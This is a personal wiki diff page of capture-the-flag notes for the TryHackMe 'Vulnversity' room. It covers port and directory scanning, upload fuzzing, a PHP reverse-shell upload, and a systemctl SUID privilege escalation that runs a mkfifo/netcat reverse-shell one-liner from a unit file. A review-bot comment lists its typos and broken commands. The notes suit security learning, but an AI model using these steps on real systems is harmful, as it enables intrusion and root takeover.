The gMan nixWiki

Because the mind is made of Teflon...

prac_app_tryhackme

Differences

prac_app_tryhackme [2022/09/24 18:28] gmanprac_app_tryhackme [2022/09/24 19:03] (current) gman
Line 4: Line 4:
  
 ====== Vulnversity ====== ====== Vulnversity ======
 +
 +Write-Ups: [[https://n0w4n.nl/vulnversity/ | n0w4n]]
  
 ===== Port/Version Scan ===== ===== Port/Version Scan =====
  
-Mine: ''nmap -vv -p- -sV -A [IP]''+Mine:
  
-[[https://n0w4n.nl/vulnversity/ | n0w4n's]]: ''nmap -n -T4 -sS -sV -sC -oN nmap/portscan -p- 10.10.207.138''+<code>nmap -vv -p- -sV -A [IP]</code> 
 + 
 +[[https://n0w4n.nl/vulnversity/ | n0w4n's]]:  
 + 
 +<code>nmap -n -T4 -sS -sV -sC -oN nmap/portscan -p- 10.10.207.138</code>
  
 ===== GoBuster (dirs) ===== ===== GoBuster (dirs) =====
  
-brute-force directories & files, DNS subdomains, and virtual host names.+Brute-force directories & files, DNS subdomains, and virtual host names
 + 
 +<code> 
 +    apt-get install gobuster 
 +    wordlists under /usr/share/wordlists 
 +    Syntax: gobuster dir -u http://<ip>:3333 -w <word list location> 
 +    -e                Print the full URLs in your console 
 +    -u                The target URL 
 +    -w                Path to your wordlist 
 +    -U and -P         Username and Password for Basic Auth 
 +    -p <x>            Proxy to use for requests 
 +    -c <http cookies> Specify a cookie for simulating your auth 
 +</code> 
 + 
 +[[https://n0w4n.nl/vulnversity/ | n0w4n]]: Used DirSearch 
 + 
 +<code>dirsearch -u http://10.10.207.138:3333 -e php -x 400,404</code> 
 + 
 +===== Burp: Intruder ===== 
 + 
 +**Burp Suite Intruder:** Fuzz the ''/internal/'' directory to see what kinds of file extensions it will allow you to upload. 
 + 
 +[[https://n0w4n.nl/vulnversity/ | n0w4n]]: Load the wordlist and don’t forget to disable the encode options. If you forget this, you will not have the proper result as your filename will be ''file%2ephp'', which won’t work. 
 +  * I did that... and it didn't work. 
 + 
 +===== Reverse Shell ===== 
 + 
 +Obtain an exploit reverse shell to upload: [[https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php | pentestmonkey]] 
 + 
 +  * You have to rename it .phtml to upload it. 
 +  * Upload it. 
 +  * Start a listener on your attack machine: 
 + 
 +<code> 
 +nc -lvnp 1234 
 + 
 +# -l listener 
 +# -v verbose 
 +# -n numeric-only IPs, no DNS 
 +# -p port (local port number) 
 +</code>  
 + 
 +  * Then execute the .phtml file on the target machine:  
 + 
 +<code>http:[IP]:3333/internal/uploads</code> 
 + 
 +===== Privilege Escalation ===== 
 + 
 +[[https://n0w4n.nl/vulnversity/ | n0w4n]]: For a lot of CTFs, a good find are files with the SUID bit set. 
 + 
 +<code> 
 +find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null 
 + 
 +# -l long listing format 
 +# -d list directory names, not contents 
 +</code> 
 + 
 +**Or use PEASS:** [[https://pentesttools.net/peass-privilege-escalation-awesome-scripts-suite/ | Privilege]]Escalation Awesom Scripts Suite 
 +  * [[https://github.com/carlospolop/PEASS-ng/releases/tag/20220918 | Download]] 
 +  * [[https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS | Linpeas]]:  Linux local Privilege Escalation Awesome Script (.sh) 
 + 
 +**Discovered Vulnerability:** [[https://gtfobins.github.io/gtfobins/systemctl/ | systemctl is SUID root]] 
 + 
 +===== Exploit ===== 
 + 
 +[[https://n0w4n.nl/vulnversity/ | n0w4n]]: He said we did not have perms to write in the default systemctl dir, so he created the unit file as an ENVIRONMENT VARIABLE. 
 + 
 +  * First we create a variable which holds a unique file (on target machine).  
 + 
 +<code>eop=$(mktemp).service</code> 
 + 
 +  * Then we create an unit file and write it into the variable. Inside the unit file we enter a command that will let the shell execute the command ''cat'' and redirect the output of ''cat'' to a file called ''output'' in the folder ''/tmp/''
 + 
 +<code> 
 +echo '[Service] 
 +> ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output" 
 +> [Install] 
 +> WantedBy=multi-user.target' > $eop 
 +</code> 
 + 
 +  * And finally we use the /bin/systemctl program to enable the unit file. 
 + 
 +<code> 
 +/bin/systemctl link $eop 
 +# Created symlink from /etc/systemd/system/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service. 
 + 
 +/bin/systemctl enable --now $eop 
 +# Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service. 
 +</code> 
 + 
 +  * Find it: 
 + 
 +<code>ls -lah /tmp</code> 
 + 
 +===== Alternative Exploit ===== 
 + 
 +**To get a reverse root shell:** 
 + 
 +**NOTE:** the target machine is using netcat OpenBSD, NOT the traditional netcat. That means the -e (execute) flag will not work. See **Netcat (Traditional)** and **Netcat (OpenBSD)" (OpenBSD netcat removed the -e flag “for security” ([[https://kb.systemoverlord.com/security/postex/reverse/ | link]]). 
 + 
 +<code> 
 +# nc (openbsd): 
 +rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 </tmp/f|nc $HOST $PORT >/tmp/
 +</code> 
 + 
 +  * Create your unit file: 
 + 
 +<code> 
 +echo '[Service] 
 +Type=oneshot 
 +ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 </tmp/f|nc $HOST $PORT >/tmp/f" 
 +[Install] 
 +WantedBy=multi-user.target' > gk.service 
 +</code> 
 + 
 +  * Open a listener on your attack machine: 
 + 
 +<code>nc -lvnp 7777</code> 
 + 
 +  * Link and start the service: 
 + 
 +<code> 
 +/bin/systemctl link /tmp/gk.service         # need the full path 
 +/bin/systemctl enable --now /tmp/gk.service 
 +</code> 
 + 
 +Done.
  
 +----
  
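Review bot: The OpenBSD netcat one-liner under ''# nc (openbsd):'' is cut off at ''>/tmp/'' (the redirect target is missing its final ''f''; the complete form of the same command appears in the ''ExecStart='' line of ''gk.service'' below it), and ''http:[IP]:3333/internal/uploads'' under "Then execute the .phtml file" is not a valid URL (no ''//'' after the scheme, and the path should end in the uploaded file's name). Also in this hunk: the single quotes around the ''echo'' that writes ''gk.service'' keep ''$HOST'' and ''$PORT'' as literal text, so the text should say they are placeholders to fill in before the file is written; that ''echo'' writes ''gk.service'' into the current directory while the ''systemctl link'' step uses ''/tmp/gk.service'', so the two only agree when run from ''/tmp'' (''> /tmp/gk.service'' would make that explicit); under "Exploit", "created the unit file as an ENVIRONMENT VARIABLE" is inaccurate, since ''eop'' holds only the temp file's path and the unit file is written to that path; in the NOTE under "Alternative Exploit", ''**Netcat (OpenBSD)"'' mixes a bold marker with a quote, and both "Netcat (...)" references read like page names that could be wiki links. Typos: "Awesom" should be "Awesome" and ''Privilege]]Escalation'' needs a space after the link; "an unit file" should be "a unit file"; "a good find are files" should be "a good find is files".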
prac_app_tryhackme.1664044092.txt.gz · Last modified: by gman